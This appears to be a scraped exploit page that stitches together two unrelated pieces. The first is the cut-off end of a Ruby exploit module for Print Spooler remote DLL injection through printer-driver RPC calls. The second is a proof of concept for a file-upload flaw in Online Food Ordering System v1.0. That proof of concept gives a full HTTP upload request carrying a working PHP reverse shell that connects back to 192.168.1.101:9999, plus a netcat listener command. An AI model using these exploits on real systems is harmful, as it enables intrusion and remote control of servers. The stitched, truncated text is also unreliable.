2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)    fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length    DriverInfo2.read(response.p_drivers.map(&:chr).join)  end  def get_printer_driver_directory(environment)    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)    fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length    RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')  end  def add_printer_driver_ex(container)    flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES    begin      response = rprn_call('RpcAddPrinterDriverEx', p_name: "\\\\#{datastore['RHOST']}", p_driver_container: container, dw_file_copy_flags: flags)    rescue RubySMB::Error::UnexpectedStatusCode => e      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first      message = "Error #{nt_status.name} (#{nt_status.description})"      if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN        # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected        print_status('The named pipe connection was broken, reconnecting...')        reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do          dcerpc_bind_spoolss        rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e          false        else          true        end        unless reconnected          vprint_status('Failed to reconnect to the named pipe.')          return nil        end        print_status('Successfully reconnected to the named pipe.')        retry      else        print_error(message)      end      return nt_status    end    error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first    message = "RpcAddPrinterDriverEx response #{response.error_status}"    message << " #{error.name} (#{error.description})" unless error.nil?    vprint_status(message)    error  end  def rprn_call(name, **kwargs)    request = PrintSystem.const_get("#{name}Request").new(**kwargs)    begin      raw_response = dcerpc.call(request.opnum, request.to_binary_s)    rescue Rex::Proto::DCERPC::Exceptions::Fault => e      fail_with(Failure::UnexpectedReply, "The #{name} Print System RPC request failed (#{e.message}).")    end    PrintSystem.const_get("#{name}Response").read(raw_response)  end  class DriverInfo2Header < BinData::Record    endian :little    uint32     :c_version    uint32     :name_offset    uint32     :environment_offset    uint32     :driver_path_offset    uint32     :data_file_offset    uint32     :config_file_offset  end  # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2  # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030  DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do    def self.read(data)      header = DriverInfo2Header.read(data)      new(        header,        RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')      )    end  endend

Print Spooler Remote DLL Injection

An arbitrary file upload vulnerability in the Select Image function of Online Food Ordering System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

\# Online Food Ordering System Unrestricted File Upload + Remote Code Execution \* Exploit Date: 4/18/2022 \* Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit \* Step => Login to admin -> \`Categoty\` -> \`Add Categoty\` -> \`Upload malicious file\` \* Injection Point => \`Select Image\` !\[\](https://i.imgur.com/LHML1T2.png) \* Use netcat listen web shell \`\`\`python= nc.exe -vv -l -p 9999 \`\`\` \* Log out admin page or stayed, web shell direct connected !!! !\[\](https://i.imgur.com/Kkz3kQc.png) # POC \* Request \`\`\`python= POST /online-food-order/admin/add-category.php HTTP/1.1 Host: 192.168.1.101:8888 Content-Length: 9853 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.101:8888 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydqHz7jzGYIN0VWy4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.101:8888/online-food-order/admin/add-category.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: \_lang=en; PHPSESSID=hpgbm1opdd0qcqb5f73jvpr4ia Connection: close ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="title" Hacked ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="image"; filename="nc.php" Content-Type: application/octet-stream <?php class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function \_\_construct($addr, $port) { $this->addr = $addr; $this->port = $port; } private function detect() { $detected = true; if (stripos(PHP\_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP\_OS, 'WIN32') !== false || stripos(PHP\_OS, 'WINNT') !== false || stripos(PHP\_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; } else { $detected = false; echo "SYS\_ERROR: Underlying operating system is not supported, script will now exit...\\n"; } return $detected; } private function daemonize() { $exit = false; if (!function\_exists('pcntl\_fork')) { echo "DAEMONIZE: pcntl\_fork() does not exists, moving on...\\n"; } else if (($pid = @pcntl\_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\\n"; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n"; } else if (posix\_setsid() < 0) { // once daemonized you will actually no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n"; } else { echo "DAEMONIZE: Completed successfully!\\n"; } return $exit; } private function settings() { @error\_reporting(0); @set\_time\_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str\_replace('<', '&lt;', $data); $data = str\_replace('>', '&gt;', $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot read from ${name}, script will now exit...\\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot write to ${name}, script will now exit...\\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length $this->dump($data); // script's dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat\['size'\]; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; $this->dump($data); // script's dump } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC\_ERROR: {$errno}: {$errstr}\\n"; } else { stream\_set\_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = @proc\_open($this->shell, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "PROC\_ERROR: Cannot start the shell\\n"; } else { foreach ($pipes as $pipe) { stream\_set\_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- $status = proc\_get\_status($process); @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status\['pid'\] . "\\n"); do { $status = proc\_get\_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC\_ERROR: Shell connection has been terminated\\n"; break; } else if (feof($pipes\[1\]) || !$status\['running'\]) { // check for end-of-file on STDOUT or if process is still running echo "PROC\_ERROR: Shell process has been terminated\\n"; break; // feof() does not work with blocking streams } // use proc\_get\_status() instead $streams = array( 'read' => array($socket, $pipes\[1\], $pipes\[2\]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num\_changed\_streams = @stream\_select($streams\['read'\], $streams\['write'\], $streams\['except'\], 0); // wait for stream changes | will not wait on Windows OS if ($num\_changed\_streams === false) { echo "STRM\_ERROR: stream\_select() failed\\n"; break; } else if ($num\_changed\_streams > 0) { if ($this->os === 'LINUX') { if (in\_array($socket , $streams\['read'\])) { $this->rw($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in\_array($pipes\[2\], $streams\['read'\])) { $this->rw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in\_array($pipes\[1\], $streams\['read'\])) { $this->rw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in\_array($socket, $streams\['read'\])/\*------\*/) { $this->rw ($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes\[2\])) && $fstat\['size'\]) { $this->brw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes\[1\])) && $fstat\['size'\]) { $this->brw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } while (!$this->error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc\_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.1.101', 9999); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc\_collect\_cycles(); echo '</pre>'; ?> ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="featured" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="active" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="submit" Add Category ------WebKitFormBoundarydqHz7jzGYIN0VWy4-- \`\`\`

Tag

#rce